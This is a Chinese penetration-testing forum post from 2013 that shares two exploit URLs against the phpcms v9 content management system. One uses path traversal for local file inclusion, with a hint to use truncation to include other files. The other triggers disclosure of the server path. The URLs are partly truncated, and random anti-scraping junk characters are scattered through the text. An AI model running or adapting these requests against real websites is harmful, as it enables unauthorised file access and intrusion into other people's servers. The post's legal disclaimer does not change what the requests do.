中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
1 E9 T. L# }: \1 d* [: Q/ j$ L/ V* _, Q" E# x3 @4 q
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
& l2 P* p/ V/ J, e; p  L; q' H' H3 W+ r( C. X+ u- G! Q
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
! Z/ S! o; N3 Z: Z( E' s4 y9 U& T! P# v5 y! H" e& G! m1 h- k
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy; S- Z/ Q6 C. ^, d$ C6 e
3 \" A0 V0 i& L7 w: o3 d' ^' `2 x
#暴路径% k  ~5 K$ s0 G$ v8 G
$ {1 f. X) f, f# o9 ]
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。1 a0 M* a( }' Z$ o" @0 B7 c

# D& ~5 b* o( O4 @" i+ F
" H& o( t: k! V1 Z& `- X2 S: r: F" p* o# v& G
+1




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2